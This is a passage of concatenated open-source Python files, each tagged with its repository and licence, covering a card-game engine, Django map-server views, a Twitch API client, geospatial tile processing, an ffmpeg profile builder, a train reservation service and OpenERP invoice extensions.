		"""Re-evaluate every registered aura (unless refresh is paused)."""
		if self.no_aura_refresh:
			return
		for aura in self.auras:
			aura.update()

	def prepare(self):
		"""Set up players, heroes, decks and the opening hands."""
		self.players[0].opponent = self.players[1]
		self.players[1].opponent = self.players[0]
		for player in self.players:
			self.manager.new_entity(player)
			player.zone = Zone.PLAY
			player.summon(player.original_deck.hero)
			for card in player.original_deck:
				card.controller = player
				card.zone = Zone.DECK
			player.shuffle_deck()
			player.playstate = PlayState.PLAYING
			player.cards_drawn_this_turn = 0

		first, second = self.pick_first_player()
		self.player1 = first
		self.player1.first_player = True
		self.player2 = second
		self.player2.first_player = False
		# The player going second draws one extra card.
		self.player1.draw(3)
		self.player2.draw(4)
		self.current_player = self.player1

	def start(self):
		logging.info("Starting game: %r" % (self))
		self.prepare()
		self.begin_turn(self.player1)

	def end_turn(self):
		"""Queue an EndTurn action for the current player."""
		return self.queue_actions(self, [EndTurn(self.current_player)])

	def _end_turn(self):
		logging.info("%s ends turn %i", self.current_player, self.turn)
		self.step, self.next_step = self.next_step, Step.MAIN_CLEANUP
		self.current_player.temp_mana = 0
		# Characters frozen before attacking thaw at end of turn.
		for character in self.current_player.characters.filter(frozen=True):
			if not character.num_attacks:
				character.frozen = False
		for buff in self.current_player.entities.filter(one_turn_effect=True):
			logging.info("Ending One-Turn effect: %r", buff)
			buff.destroy()
		self.step, self.next_step = self.next_step, Step.MAIN_NEXT
		self.begin_turn(self.current_player.opponent)

	def begin_turn(self, player):
		"""Queue a BeginTurn action for \a player."""
		return self.queue_actions(self, [BeginTurn(player)])

	def _begin_turn(self, player):
		self.step, self.next_step = self.next_step, Step.MAIN_START_TRIGGERS
		self.step, self.next_step = self.next_step, Step.MAIN_START
		self.turn += 1
		logging.info("%s begins turn %i", player, self.turn)
		self.step, self.next_step = self.next_step, Step.MAIN_ACTION
		self.current_player = player
		self.minions_killed_this_turn = CardList()

		for p in self.players:
			p.cards_drawn_this_turn = 0
			p.current_player = p is player

		# Reset the per-turn player counters and mana.
		player.turn_start = timegm(time.gmtime())
		player.cards_played_this_turn = 0
		player.minions_played_this_turn = 0
		player.minions_killed_this_turn = 0
		player.combo = False
		player.max_mana += 1
		player.used_mana = 0
		player.overload_locked = player.overloaded
		player.overloaded = 0
		for entity in player.entities:
			if entity.type != CardType.PLAYER:
				entity.turns_in_play += 1
				if entity.type == CardType.HERO_POWER:
					entity.exhausted = False
				elif entity.type in (CardType.HERO, CardType.MINION):
					entity.num_attacks = 0

		player.draw()
class CoinRules:
	"""
	Randomly determines the starting player when the Game starts.
	The second player gets "The Coin" (GAME_005).
	"""

	def pick_first_player(self):
		# Flip for it: whoever wins the toss goes first.
		coin_winner = random.choice(self.players)
		logging.info("Tossing the coin... %s wins!", coin_winner)
		return coin_winner, coin_winner.opponent

	def start(self):
		super().start()
		# Compensate the player going second with The Coin.
		logging.info("%s gets The Coin (%s)", self.player2, THE_COIN)
		self.player2.give(THE_COIN)
class MulliganRules:
	"""
	Performs a Mulligan phase when the Game starts.
	Currently just a dummy phase.
	"""

	def start(self):
		self.next_step = Step.BEGIN_MULLIGAN
		super().start()
		self.begin_mulligan()

	def begin_mulligan(self):
		logging.info("Entering mulligan phase")
		# Advance the step machine: current step becomes the queued one,
		# and the game is ready to begin afterwards.
		self.step = self.next_step
		self.next_step = Step.MAIN_READY
class Game(MulliganRules, CoinRules, BaseGame):
	"""Standard game: mulligan phase and coin toss on top of BaseGame."""
	pass
| butozerca/fireplace | fireplace/game.py | Python | agpl-3.0 | 9,162 |
# -*- coding: utf-8 -*-
import logging
import subprocess
import os.path
from django.http import HttpResponse, Http404
from django.views.generic import View
from django.conf import settings
from braces.views import JSONResponseMixin
from sunlumo_project.models import Project
from .renderer import Renderer
from .featureinfo import FeatureInfo
from .project import SunlumoProject
from .utils import writeParamsToJson, str2bool, hex2rgb
LOG = logging.getLogger(__name__)
class UpperParamsMixin(object):
    """Expose the request's GET parameters with upper-cased keys.

    WMS parameter names are case-insensitive, so views read them from
    ``self.req_params`` with canonical upper-case keys.
    """

    def dispatch(self, request, *args, **kwargs):
        upper_params = {}
        for key in request.GET.keys():
            upper_params[key.upper()] = request.GET[key]
        self.req_params = upper_params
        return super(UpperParamsMixin, self).dispatch(
            request, *args, **kwargs
        )
class ProjectDetails(UpperParamsMixin, JSONResponseMixin, View):
    """Return the configured QGIS project's details as JSON."""

    def get(self, request, *args, **kwargs):
        current_project = Project.objects.get(pk=settings.SUNLUMO_PROJECT_ID)
        sl_project = SunlumoProject(current_project.project_path)
        details = sl_project.getDetails()
        return self.render_json_response(details)
class GetMapView(UpperParamsMixin, JSONResponseMixin, View):
    """WMS-style endpoint handling both GetMap rendering and feature info."""

    def _parse_request_params(self, request):
        """Validate and parse the WMS query parameters.

        Raises Http404 on any missing or unparsable parameter.
        """
        if not(all(param in self.req_params for param in [
                'BBOX', 'WIDTH', 'HEIGHT', 'SRS', 'FORMAT', 'LAYERS',
                'TRANSPARENCIES', 'REQUEST'])):
            raise Http404

        try:
            request = self.req_params.get('REQUEST')
            bbox = [float(a) for a in self.req_params.get('BBOX').split(',')]
            image_size = [
                int(a) for a in (
                    self.req_params.get('WIDTH'),
                    self.req_params.get('HEIGHT'))
            ]
            srs = int(self.req_params.get('SRS').split(':')[-1])
            image_format = self.req_params.get('FORMAT').split('/')[-1]
            transparent = str2bool(self.req_params.get('TRANSPARENT', False))
            bgcolor = hex2rgb(self.req_params.get('BGCOLOR', '0xFFFFFF'))
            layers = [
                layer.strip()
                for layer in self.req_params.get('LAYERS').split(',')
            ]
            if self.req_params.get('QUERY_LAYERS'):
                query_layers = [
                    layer.strip()
                    for layer in self.req_params.get('QUERY_LAYERS').split(',')
                ]
            else:
                query_layers = []
            if self.req_params.get('X') and self.req_params.get('Y'):
                click_point = [
                    int(self.req_params.get('X')),
                    int(self.req_params.get('Y'))
                ]
            else:
                click_point = []
            transparencies = [
                int(a)
                for a in self.req_params.get('TRANSPARENCIES').split(',')
                if len(a) > 0
            ]
        except Exception:
            # return 404 if any of parameters are missing or not parsable
            # (was a bare ``except:``, which also swallowed SystemExit and
            # KeyboardInterrupt)
            raise Http404

        # map must have a value
        if not request:
            raise Http404

        # check if image format is supported
        if image_format not in ['png', 'jpeg', 'png8']:
            raise Http404

        params = {
            'bbox': bbox,
            'image_size': image_size,
            'srs': srs,
            'image_format': image_format,
            'transparent': transparent,
            'bgcolor': bgcolor,
            'layers': layers,
            'transparencies': transparencies,
            'request': request,
            'query_layers': query_layers,
            'click_point': click_point
        }
        return params

    def get(self, request, *args, **kwargs):
        """Render the map image, or identify features for other requests."""
        params = self._parse_request_params(request)

        project = Project.objects.get(pk=settings.SUNLUMO_PROJECT_ID)

        if params.get('request') == 'GetMap':
            sl_project = Renderer(project.project_path)
            img = sl_project.render(params)
            return HttpResponse(img, content_type=params.get('image_format'))
        else:
            # Anything other than GetMap is treated as a feature query.
            sl_project = FeatureInfo(project.project_path)
            features = sl_project.identify(params)
            return self.render_json_response(features)
class GetLegendGraphicView(UpperParamsMixin, JSONResponseMixin, View):
    """WMS GetLegendGraphic endpoint: renders a legend image for one layer."""

    def _parse_request_params(self, request):
        """Validate and parse the legend parameters; Http404 on any problem."""
        if not(all(param in self.req_params for param in [
                'FORMAT', 'LAYER', 'REQUEST'])):
            raise Http404

        try:
            request = self.req_params.get('REQUEST')
            # -1 means "no explicit size requested".
            image_size = [
                int(a) for a in (
                    self.req_params.get('WIDTH', -1),
                    self.req_params.get('HEIGHT', -1))
            ]
            image_format = self.req_params.get('FORMAT').split('/')[-1]
            layer = self.req_params.get('LAYER').strip()
        except Exception:
            # return 404 if any of parameters are missing or not parsable
            # (was a bare ``except:``, which also swallowed SystemExit and
            # KeyboardInterrupt)
            raise Http404

        # map must have a value
        if not request:
            raise Http404

        # check if image format is supported
        if image_format not in ['png', 'jpeg', 'png8']:
            raise Http404

        params = {
            'image_format': image_format,
            'image_size': image_size,
            'layer': layer,
            'request': request
        }
        return params

    def get(self, request, *args, **kwargs):
        """Render and return the legend graphic for the requested layer."""
        params = self._parse_request_params(request)

        project = Project.objects.get(pk=settings.SUNLUMO_PROJECT_ID)

        sl_project = Renderer(project.project_path)
        img = sl_project.getLegendGraphic(params)
        return HttpResponse(img, content_type=params.get('image_format'))
class PrintPDFView(UpperParamsMixin, View):
    """Render a map composition to PDF via the ``print_map`` subprocess."""

    def _parse_request_params(self, request):
        """Validate and parse the print parameters; Http404 on any problem."""
        if not(all(param in self.req_params for param in [
                'BBOX', 'LAYOUT', 'LAYERS', 'TRANSPARENCIES'])):
            raise Http404

        try:
            bbox = [float(a) for a in self.req_params.get('BBOX').split(',')]
            srs = int(self.req_params.get('SRS').split(':')[-1])
            layers = [
                layer.strip()
                for layer in self.req_params.get('LAYERS').split(',')
            ]
            layout = self.req_params.get('LAYOUT')
            transparencies = [
                int(a)
                for a in self.req_params.get('TRANSPARENCIES').split(',')
                if len(a) > 0
            ]
        except Exception:
            # return 404 if any of parameters are missing or not parsable
            # (was a bare ``except:``, which also swallowed SystemExit and
            # KeyboardInterrupt)
            raise Http404

        if not layout:
            # composer template should not be empty
            raise Http404

        return {
            'bbox': bbox,
            'layout': layout,
            'layers': layers,
            'transparencies': transparencies,
            'srs': srs
        }

    def get(self, request, *args, **kwargs):
        """Run the print subprocess and stream back the resulting PDF."""
        params = self._parse_request_params(request)
        params.update({'sl_project_id': settings.SUNLUMO_PROJECT_ID})

        tmpFile = writeParamsToJson(params)
        # printing requires a subprocess call
        proc = subprocess.call(['python', 'manage.py', 'print_map', tmpFile])
        if proc:
            # subprocess did not exit cleanly
            return HttpResponse(status=500)

        # PDF is binary data: must be read in 'rb' mode (text mode would
        # raise UnicodeDecodeError / corrupt the payload on Python 3).
        with open(tmpFile + '.pdf', 'rb') as pdfFile:
            data = pdfFile.read()

        resp = HttpResponse(data, content_type='application/pdf')
        resp['Content-Disposition'] = 'attachment; filename={}.pdf'.format(
            os.path.basename(tmpFile)
        )
        return resp
| candela-it/sunlumo | django_project/sunlumo_mapserver/views.py | Python | mit | 7,606 |
import requests
_base_url = 'https://api.twitch.tv/kraken/'

# HTTP verbs this wrapper knows how to issue.
_supported_actions = ('get', 'post', 'put', 'delete')


class Query:
    """A single request against the Twitch kraken API."""

    def __init__(self, action, url):
        """Store the HTTP verb (lower-cased) and the full endpoint URL."""
        self.action = action.lower()
        self.parameters = dict()
        self.url = _base_url + url

    # add parameters to the query
    # parameter | dictionary of parameters and corresponding values
    def add_parameters(self, passed):
        # NOTE: this replaces any previously-set parameters.
        self.parameters = dict()
        for key, value in passed.items():
            self.parameters[key] = value

    def fetch(self):
        """Execute the request; return the decoded JSON or None on failure."""
        # Previously an unsupported verb fell through every if/elif branch
        # and raised NameError on the unbound ``response``; fail soft instead.
        if self.action not in _supported_actions:
            return None

        # Let requests build and percent-encode the query string rather than
        # concatenating 'key=value&' pairs by hand (the old code did no URL
        # encoding and always left a trailing '&').
        response = requests.request(self.action, self.url,
                                    params=self.parameters)

        # check for a failure
        if response.status_code != requests.codes.ok:
            return None
        return response.json()
def api(action, url, **kwargs):
    """Convenience wrapper: build a Query, stringify the keyword
    parameters, and return the fetched data (or None on failure)."""
    query = Query(action, url)

    # Coerce every parameter value to a string before attaching it.
    stringified = {}
    for key, value in kwargs.items():
        stringified[key] = str(value)
    query.add_parameters(stringified)

    return query.fetch()
| bm993a/ptwitch | query.py | Python | apache-2.0 | 1,199 |
'''
Rewindows tiles from 40000x1 pixels to 160x160 pixels for use in aggregate map creation.
Specifically, does tiles that are not model outputs but are used in aggregate map creation:
tree cover density, pixel area, Hansen gain, and mangrove biomass.
This must be done before the model is run so that the aggregate maps can be created successfully
(aggregate map pixels are the sum of the rewindowed 160x160 pixel windows).
'''
import multiprocessing
from subprocess import Popen, PIPE, STDOUT, check_call
from functools import partial
import datetime
import argparse
import os
import glob
import sys
sys.path.append('../')
import constants_and_names as cn
import universal_util as uu
def mp_rewindow_tiles(tile_id_list, run_date=None, no_upload=None):
    """
    Rewindows the basic (non-model-output) inputs — tree cover density,
    pixel area, Hansen gain and mangrove biomass — from 40000x1 pixel
    windows to 160x160 pixel windows for aggregate map creation.

    :param tile_id_list: list of tile ids (or the string 'all')
    :param run_date: optional YYYYMMDD date used in output s3 paths
    :param no_upload: when truthy, skip uploading outputs to s3
    """
    os.chdir(cn.docker_base_dir)

    # Sensitivity analysis model type is not used in this script
    sensit_type = 'std'

    # Files to download for this script
    download_dict = {
        cn.pixel_area_dir: [cn.pattern_pixel_area],
        cn.tcd_dir: [cn.pattern_tcd],
        cn.gain_dir: [cn.pattern_gain],
        cn.mangrove_biomass_2000_dir: [cn.pattern_mangrove_biomass_2000]
    }

    uu.print_log("Layers to process are:", download_dict)

    # List of output directories. Must match order of output patterns.
    output_dir_list = [cn.pixel_area_rewindow_dir, cn.tcd_rewindow_dir,
                       cn.gain_rewindow_dir, cn.mangrove_biomass_2000_rewindow_dir]

    # List of output patterns. Must match order of output directories.
    output_pattern_list = [cn.pattern_pixel_area_rewindow, cn.pattern_tcd_rewindow,
                           cn.pattern_gain_rewindow, cn.pattern_mangrove_biomass_2000_rewindow]

    # A date can optionally be provided.
    # This replaces the date in constants_and_names.
    # Only done if output upload is enabled.
    if run_date is not None and no_upload is not None:
        output_dir_list = uu.replace_output_dir_date(output_dir_list, run_date)

    # Iterates through the types of tiles to be processed.
    # (The loop variable was previously named ``dir``, shadowing the builtin.)
    for input_dir, download_pattern in list(download_dict.items()):

        download_pattern_name = download_pattern[0]

        # Downloads input files or entire directories, depending on how many tiles are in the tile_id_list
        # If a full model run is specified, the correct set of tiles for the particular script is listed
        if tile_id_list == 'all':
            # List of tiles to run in the model
            tile_id_list = uu.tile_list_s3(input_dir, sensit_type)

        uu.s3_flexible_download(input_dir, download_pattern_name, cn.docker_base_dir, sensit_type, tile_id_list)
        uu.print_log("There are {0} tiles to process for pattern {1}".format(str(len(tile_id_list)), download_pattern_name) + "\n")
        uu.print_log("Processing:", input_dir, "; ", download_pattern_name)

        # Converts the 10x10 degree Hansen tiles that are in windows of 40000x1 pixels to windows of 160x160 pixels
        if cn.count == 96:
            # For pixel area: 40 processors = 480 GB peak; 54 = 650 GB peak; 56 = XXX GB peak; 62 = >750 GB peak.
            # Much more memory used for pixel area than for other inputs.
            processes = 56
        else:
            processes = 8
        uu.print_log('Rewindow max processors=', processes)
        pool = multiprocessing.Pool(processes)
        pool.map(partial(uu.rewindow, download_pattern_name=download_pattern_name,
                         no_upload=no_upload), tile_id_list)
        pool.close()
        pool.join()

        # # For single processor use
        # for tile_id in tile_id_list:
        #
        #     uu.rewindow(tile_id, download_pattern_name, no_upload)

    # If no_upload flag is not activated (by choice or by lack of AWS credentials), output is uploaded
    if not no_upload:
        uu.print_log("Tiles processed. Uploading to s3 now...")
        for i in range(0, len(output_dir_list)):
            uu.upload_final_set(output_dir_list[i], output_pattern_list[i])
if __name__ == '__main__':

    # Command-line entry point: parse arguments, set up logging, validate
    # the tile list and kick off the rewindowing run.
    cli = argparse.ArgumentParser(
        description='Creates 160x160 pixel rewindowed basic input tiles (TCD, gain, mangroves, pixel area)')
    cli.add_argument('--tile_id_list', '-l', required=True,
                     help='List of tile ids to use in the model. Should be of form 00N_110E or 00N_110E,00N_120E or all.')
    cli.add_argument('--run-date', '-d', required=False,
                     help='Date of run. Must be format YYYYMMDD.')
    cli.add_argument('--no-upload', '-nu', action='store_true',
                     help='Disables uploading of outputs to s3')
    parsed = cli.parse_args()

    tile_id_list = parsed.tile_id_list
    run_date = parsed.run_date
    no_upload = parsed.no_upload

    # Disables upload to s3 if no AWS credentials are found in environment
    if not uu.check_aws_creds():
        no_upload = True

    # Create the output log
    uu.initiate_log(tile_id_list=tile_id_list, run_date=run_date, no_upload=no_upload)

    # Checks whether the tile_id_list argument is valid
    tile_id_list = uu.tile_id_list_check(tile_id_list)
mp_rewindow_tiles(tile_id_list=tile_id_list, run_date=run_date, no_upload=no_upload) | sgibbes/carbon-budget | data_prep/mp_rewindow_tiles.py | Python | apache-2.0 | 5,324 |
list_a = [3, 9, 17, 15, 19]
list_b = [2, 4, 8, 10, 30, 40, 50, 60, 70, 80, 90]

# BUG FIX: the original loop used the *values* yielded by zip() as
# *indices* (``list_a[a] > list_b[b]``), which raises IndexError as soon
# as a value exceeds the list length. The intent — print the larger of
# each aligned pair — compares the values directly. zip() stops at the
# shorter list, so list_b's extra elements are ignored.
larger_values = [max(a, b) for a, b in zip(list_a, list_b)]
for value in larger_values:
    print(value)
| talapus/Ophidian | Academia/Lists/list_a_and_list_b.py | Python | bsd-3-clause | 201 |
# -*- coding: utf-8 -*-
#
# File: eduCourses/events.py
#
# Copyright (c) 2007 Erik Rivera Morales <erik@ro75.com>
#
# GNU General Public License (GPL)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
"""
$Id$
"""
__author__ = """Erik Rivera Morales <erik@ro75.com>"""
__docformat__ = 'plaintext'
__licence__ = 'GPL'
from Acquisition import aq_base
from eduintelligent.sco.interfaces import ISCO
def uploadContentPackage(obj, event):
    """
    Event handler: unpack the SCORM content package on ``obj`` by
    delegating to its ISCO adapter.

    :param obj: the content object the event was fired for
    :param event: the triggering event (only echoed in the debug trace)
    """
    # Debug trace (Python 2 print statement); the message text is a
    # runtime string and is left untranslated on purpose.
    print "DESEMPAQUETANDO %s on %s" % (obj.getPhysicalPath(), event)
    ISCO(obj).uploadContentPackage()
| erikriver/eduIntelligent-cynin | src/eduintelligent.sco/eduintelligent/sco/events.py | Python | gpl-3.0 | 1,228 |
# Copyright 2019 NetApp, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
from manila.api.views import share_network_subnets
from manila import test
from manila.tests.api import fakes
from manila.tests import db_utils
@ddt.ddt
class ViewBuilderTestCase(test.TestCase):
    """Tests for the share-network-subnet API view builder."""

    def setUp(self):
        super(ViewBuilderTestCase, self).setUp()
        self.builder = share_network_subnets.ViewBuilder()
        self.share_network = db_utils.create_share_network(
            name='fake_network', id='fake_sn_id')

    def _validate_is_detail_return(self, result):
        # Every detail view must carry the full set of subnet fields.
        detail_keys = ['id', 'created_at', 'updated_at', 'neutron_net_id',
                       'neutron_subnet_id', 'network_type', 'cidr',
                       'segmentation_id', 'ip_version', 'share_network_id',
                       'availability_zone', 'gateway', 'mtu']
        for detail_key in detail_keys:
            self.assertIn(detail_key, result)

    def test_build_share_network_subnet(self):
        request = fakes.HTTPRequest.blank('/subnets', version='2.51')
        fake_subnet = db_utils.create_share_network_subnet(
            share_network_id=self.share_network['id'])

        view = self.builder.build_share_network_subnet(request, fake_subnet)

        self.assertEqual(1, len(view))
        self.assertIn('share_network_subnet', view)
        subnet_view = view['share_network_subnet']
        self.assertEqual(fake_subnet['id'], subnet_view['id'])
        self.assertEqual(fake_subnet['share_network_id'],
                         subnet_view['share_network_id'])
        self.assertIsNone(subnet_view['availability_zone'])
        self._validate_is_detail_return(subnet_view)

    def test_build_share_network_subnets(self):
        request = fakes.HTTPRequest.blank('/subnets', version='2.51')
        other_network = db_utils.create_share_network(
            name='fake_network', id='fake_sn_id_1')
        fake_subnet = db_utils.create_share_network_subnet(
            share_network_id=other_network['id'])

        view = self.builder.build_share_network_subnets(request, [fake_subnet])

        self.assertIn('share_network_subnets', view)
        self.assertEqual(1, len(view['share_network_subnets']))
        for subnet_view in view['share_network_subnets']:
            self._validate_is_detail_return(subnet_view)
| openstack/manila | manila/tests/api/views/test_share_network_subnets.py | Python | apache-2.0 | 2,945 |
"""SerializedDataConverter lib."""
| facelessuser/SerializedDataConverter | lib/__init__.py | Python | mit | 35 |
from nxtools import *
__all__ = ["get_output_profile"]
# Default bitrates per codec; False means "do not set an explicit bitrate".
default_bitrates = {
    "dnxhd": "120M",
    "mjpeg": False,
    "mpeg2video": "50M",
    "libx264": "6M",
    "libx265": "4M",
    "libfdk_aac": "128k",
    "mp2": "128k"
}

# Default audio codec to pair with each video codec.
default_audio_codecs = {
    "dnxhd": "pcm_s16le",
    "mjpeg": "pcm_s16le",
    "mpeg2video": "mp2",
    "libx264": "libfdk_aac",
    "libx265": "libfdk_aac"
}


def get_output_profile(**kwargs):
    """Build the ffmpeg output-option list for an encoding profile.

    Required kwargs: ``frame_rate``, ``video_codec``, ``container``.
    Optional kwargs: ``pixel_format``, ``video_bitrate``, ``qscale``,
    ``gop_size``, ``audio_codec``, ``audio_bitrate``.

    Returns a list of ``[option, value]`` pairs (flag-only options are
    single-element lists).
    """
    #
    # Video
    #

    result = [
        ["r", kwargs["frame_rate"]],
        ["pix_fmt", kwargs.get("pixel_format", "yuv422p")],
        ["c:v", kwargs["video_codec"]]
    ]

    video_bitrate = kwargs.get("video_bitrate", False) or default_bitrates.get(kwargs["video_codec"], False)
    if video_bitrate:
        result.append(["b:v", video_bitrate])

    # .get() instead of [] so qscale/gop_size may simply be omitted
    # (previously a missing key raised KeyError).
    if kwargs.get("qscale"):
        result.append(["q:v", kwargs["qscale"]])

    if kwargs.get("gop_size"):
        gop_size = kwargs["gop_size"]
        result.extend([
            ["g", gop_size],
            ["keyint_min", gop_size],
        ])
        if kwargs["video_codec"] == "libx264":
            result.append(["x264opts", "keyint={g}:min-keyint={g}:no-scenecut".format(g=gop_size)])

    #
    # Audio
    #

    # BUG FIX: the default lookup previously used the literal string
    # "video_codec" as the key, so the per-codec audio default was never
    # found and every profile silently fell back to pcm_s16le.
    audio_codec = kwargs.get("audio_codec", default_audio_codecs.get(kwargs["video_codec"], False))
    if not audio_codec:
        audio_codec = "pcm_s16le"
    result.append(["c:a", audio_codec])

    audio_bitrate = kwargs.get("audio_bitrate", default_bitrates.get(audio_codec, False))
    if audio_bitrate:
        result.append(["b:a", audio_bitrate])

    #
    # Container
    #

    result.append(["shortest"])
    result.append(["async", 2000])
    result.append(["map_metadata", "-1"])

    if kwargs["container"] == "mov" and kwargs["frame_rate"] == 25:
        result.append(["video_track_timescale", 25])

    return result
| martastain/themis | themis/output_profile.py | Python | gpl-3.0 | 1,936 |
"""
You can get information about which each train has by using this service. For test purposes, you can start a local service using this code. You can assume the real service will behave the same way, but be available on a different url.
You need [Python 3.3](http://python.org) and [CherryPy](http://www.cherrypy.org/), then start the server by running:
python start_service.py
You can use this service to get data for example about the train with id "express_2000" like this:
http://localhost:8081/data_for_train/express_2000
this will return a json document with information about the seats that this train has. The document you get back will look for example like this:
{"seats": {"1A": {"booking_reference": "", "seat_number": "1", "coach": "A"}, "2A": {"booking_reference": "", "seat_number": "2", "coach": "A"}}}
Note I've left out all the extraneous details about where the train is going to and from, at what time, whether there's a buffet car etc. All that's there is which seats the train has, and if they are already booked. A seat is available if the "booking_reference" field contains an empty string. To reserve seats on a train, you'll need to make a POST request to this url:
http://localhost:8081/reserve
and attach form data for which seats to reserve. There should be three fields:
"train_id", "seats", "booking_reference"
The "seats" field should be a json encoded list of seat ids, for example:
'["1A", "2A"]'
The other two fields are ordinary strings. Note the server will prevent you from booking a seat that is already reserved with another booking reference.
The service has one additional method, that will remove all reservations on a particular train. Use it with care:
http://localhost:8081/reset/express_2000
"""
import json
class TrainDataService(object):
    """In-memory backing store for train seating data.

    A seat is considered free when its "booking_reference" field is the
    empty string; otherwise it holds the reference it was booked under.
    """

    def __init__(self, json_data):
        """Load the train catalogue from a JSON document string."""
        self.trains = json.loads(json_data)

    def data_for_train(self, train_id):
        """Return the JSON document describing one train ("null" if unknown)."""
        return json.dumps(self.trains.get(train_id))

    def reserve(self, train_id, seats, booking_reference):
        """Attach *booking_reference* to every seat id in the JSON list *seats*.

        All requested seats are validated before any of them is touched, so
        the reservation is all-or-nothing.  Returns the updated train
        document on success, or a plain error string when a seat is unknown
        or already booked under a different reference.
        """
        train = self.trains.get(train_id)
        requested = json.loads(seats)
        seat_map = train["seats"]
        # First pass: validate without mutating anything.
        for seat_id in requested:
            if seat_id not in seat_map:
                return "seat not found {0}".format(seat_id)
            current = seat_map[seat_id]["booking_reference"]
            if current and current != booking_reference:
                return "already booked with reference: {0}".format(current)
        # Second pass: every seat is bookable, commit the reservation.
        for seat_id in requested:
            seat_map[seat_id]["booking_reference"] = booking_reference
        return self.data_for_train(train_id)

    def reset(self, train_id):
        """Clear every reservation on the given train and return its document."""
        for seat in self.trains.get(train_id)["seats"].values():
            seat["booking_reference"] = ""
        return self.data_for_train(train_id)
| emilybache/KataTrainReservation | train_data_service/train_data_service.py | Python | mit | 2,899 |
# -*- encoding: utf-8 -*-
###########################################################################
# Module Writen to OpenERP, Open Source Management Solution
#
# Copyright (c) 2010 Vauxoo - http://www.vauxoo.com/
# All Rights Reserved.
# info Vauxoo (info@vauxoo.com)
############################################################################
# Coded by: Luis Torres (luis_t@vauxoo.com)
############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty ofres.partner form
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import ast

from openerp.osv import osv, fields
class account_invoice(osv.Model):
    """Extend account.invoice so the partner's default invoice note is
    copied into the invoice comment whenever the partner changes."""
    _inherit = 'account.invoice'

    def onchange_partner_id(self, cr, uid, ids, type, partner_id,
                            date_invoice=False, payment_term=False,
                            partner_bank_id=False, company_id=False):
        """Run the standard partner onchange, then inject the partner's
        ``description_invoice`` text as the invoice ``comment``."""
        res = super(account_invoice, self).onchange_partner_id(
            cr, uid, ids, type, partner_id,
            date_invoice=date_invoice, payment_term=payment_term,
            partner_bank_id=partner_bank_id, company_id=company_id)
        if partner_id:
            partner = self.pool.get('res.partner').browse(cr, uid, partner_id)
            res['value']['comment'] = partner.description_invoice
        return res
class stock_invoice_onshipping(osv.TransientModel):
    """Extend the invoice-on-shipping wizard so created invoices pick up
    the partner's default invoice note as their comment."""
    _inherit = 'stock.invoice.onshipping'

    def create_invoice(self, cr, uid, ids, context=None):
        """Create the invoices, then copy each partner's
        ``description_invoice`` into the matching invoice comment.

        ``res`` maps each id in ``context['active_ids']`` to the id of the
        invoice created for it.
        """
        context = context or {}
        res = super(stock_invoice_onshipping, self).create_invoice(
            cr, uid, ids, context=context)
        invoice_obj = self.pool.get('account.invoice')
        for active_id in context['active_ids']:
            description = invoice_obj.browse(
                cr, uid, res[active_id]).partner_id.description_invoice
            if description:
                invoice_obj.write(cr, uid, res[active_id],
                                  {'comment': description})
        return res
class sale_make_invoice(osv.TransientModel):
    """Extend the sale.make.invoice wizard so freshly created invoices
    get the partner's default invoice note as their comment."""
    _inherit = 'sale.make.invoice'

    def make_invoices(self, cr, uid, ids, context=None):
        """Create invoices via the standard wizard, then copy each
        partner's ``description_invoice`` into the invoice ``comment``.
        """
        if not context:
            context = {}
        res = super(sale_make_invoice, self).make_invoices(
            cr, uid, ids, context=context)
        # res['domain'] is the string form of a search domain such as
        # "[('id', 'in', [1, 2])]".  Parse it with ast.literal_eval rather
        # than eval() so the string can never execute arbitrary code.
        id_invoice = ast.literal_eval(res['domain'])
        ids_invoices = id_invoice[0][2]
        invoice_obj = self.pool.get('account.invoice')
        for invoice_id in ids_invoices:
            invoice_description = invoice_obj.browse(
                cr, uid, invoice_id).partner_id.description_invoice
            if invoice_description:
                invoice_obj.write(
                    cr, uid, invoice_id, {'comment': invoice_description})
        return res
class sale_order(osv.Model):
    """Extend sale.order so invoices created from an order inherit the
    partner's default invoice note as their comment."""
    _inherit = 'sale.order'

    def action_invoice_create(self, cr, uid, ids, grouped=False,
                              states=['confirmed', 'done', 'exception'],
                              date_inv=False, context=None):
        """Create the invoice for the sale order(s), then copy the
        partner's ``description_invoice`` into the invoice ``comment``.

        Bug fix: the previous implementation hard-coded ``grouped=False``
        and the default ``states`` list in the call to super(), silently
        discarding whatever the caller passed; both arguments are now
        forwarded unchanged.  (The mutable ``states`` default is kept as-is
        for interface compatibility; it is never mutated here.)
        """
        if not context:
            context = {}
        res = super(sale_order, self).action_invoice_create(
            cr, uid, ids, grouped=grouped, states=states,
            date_inv=date_inv, context=context)
        # ``res`` is the id of the created invoice.
        invoice_description = self.pool.get('account.invoice').browse(
            cr, uid, res).partner_id.description_invoice
        if invoice_description:
            self.pool.get('account.invoice').write(
                cr, uid, res, {'comment': invoice_description})
        return res
| 3dfxsoftware/cbss-addons | partner_invoice_description/account_invoice.py | Python | gpl-2.0 | 4,416 |
#!/usr/bin/env python
# Standard packages
import sys
import argparse
# Third-party packages
from toil.job import Job
# Package methods
from ddb import configuration
from ddb_ngsflow import annotation
from ddb_ngsflow import pipeline
from ddb_ngsflow.coverage import sambamba
if __name__ == "__main__":
    # Command line: a sample sheet, a run configuration, plus the standard
